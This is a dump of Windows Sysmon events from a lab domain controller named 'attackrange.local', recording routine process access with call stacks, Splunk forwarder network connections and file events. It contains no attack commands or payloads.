12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.012{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C
:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x80000000000000008955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.455{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53615-false52.242.101.226-443https 23542300x80000000000000008954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.244{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=515DBB5213D6EBD3B176673C7141A027,SHA256=C8D1974E875258A5D822D70129570E75161301BC05C4BEBAB003D3CDD8518B71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.010{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4A472B7200B21CFC9FC944B7F40C66D2,SHA256=2AA100BA4A6821F985D35FF918F14D6958F92502EA249C52E355EFB8458880C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.010{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E42F386D05210F26CCC3F384248FD8D1,SHA256=2C05F0A2754FD0F5CFA9117B5A5A720AD2B34A2784AFAC5F1DC2478F93628AE5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.936{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53617-false10.0.1.12-8089- 354300x80000000000000008958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.925{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53616-false10.0.1.12-8089- 23542300x80000000000000008957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:48.633{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4A472B7200B21CFC9FC944B7F40C66D2,SHA256=2AA100BA4A6821F985D35FF918F14D6958F92502EA249C52E355EFB8458880C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:48.258{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB1A7AFDCFBD13461B8372F2921F35DE,SHA256=C5F6407768A1E56E1C5EB18FC07961DC918B86F9695C4CFC2C2B2FD845C3B437,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:49.257{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE044ADA741CA4DBB18235518350110D,SHA256=16E82C76199694B042EBAAA12047417789DA4F3921C2ABC4C1CCFD4E79A3E2D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:50.271{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE2E444C9AC6C6AF83FFCC1286EF4945,SHA256=D9B242B96DF4D85F2C741D44D9D2F64F82AF0207D5D45BE234AEBDE45DAF2912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:51.316{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF5A5EF3E688ACD00DE4C7FF25C7B849,SHA256=9429638464B9D28E516AA678F5E13FF6BFD4B1D4F6B85D50B3C9787D35EC6365,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:49.432{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53618-false10.0.1.12-8000- 23542300x80000000000000008964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:52.330{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD394192122DE45276A275EAB38AE760,SHA256=424A35A9B4820BAB3FA4A3FF9BBF871A1CB30A71952819F0E3271F2ED9D066EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:53.344{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A76B60766883B7002E0553058EE642D,SHA256=E04B190443CC8EBAED0308341BA80E2BB1459B885A15E30CC92CC127C92B35D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:54.374{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE42BDE98C7619CBF1DF40A518D123EE,SHA256=6A228E629165BFB6C69C18F7E9CA6A619A14436EABBA1BB9EF4EE71FD3B99CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:55.388{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70DA2C550D230A3B247EA2BE721A359B,SHA256=723D03CD7D8EF22C88FB8355545DDD05B95FE6A9EF05ECCD3574DEFE9A2CDCC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:56.402{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D1F41683EB913992A6E7F2FDA9A5C1,SHA256=FE4321EE24D34D2312EF7C24505366C3C6769F694295641B9870218F32329189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:57.416{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D5C0DEC21FEDCB6AF8A3E5DE91328EE,SHA256=EFF76DFFC06F168085CDC16CE500571E31A38CE95A5C29C1697C66E05D4233E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:55.370{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53619-false10.0.1.12-8000- 23542300x80000000000000008971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:58.477{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BACF4C79D81DBCE51FECDEB279D1146F,SHA256=0283CC092F9B04BCB760A730E990EF23CBAD7428C33B20B03A0BABBD5E9F45F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:59.507{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF779CF35DA177840AAA79EE5BAC5298,SHA256=6DFDFEA44A3F2D06AA77A2BF6DBCB846DE5A6891B761F56F6F30BF8F5AB5CB3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:00.521{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC7812B9A5108D019A3C15094E8CFA89,SHA256=4FE6FEA1D8E50C0D7D6D16A8714DAB0BDE290FE45CC71F6C5FD27D9C3CF2E276,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:01.988{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000008975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:01.988{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000008974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:01.535{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD076B7D57D9A68C3F730F14F0D34BD,SHA256=DBC9FFDF214D6C00130E303B6AEA45497D201B9813A17B799F4655E988C67DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:02.627{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1307B53AC95F73E077646A4224F73B0A,SHA256=285B5406BC833DB4169AD33F73D8DAF4BF5F2F460D62A0C3CE2A58770FAF988E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:00.526{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53620-false10.0.1.12-8000- 10341000x80000000000000008978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:02.035{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000008977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:02.035{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e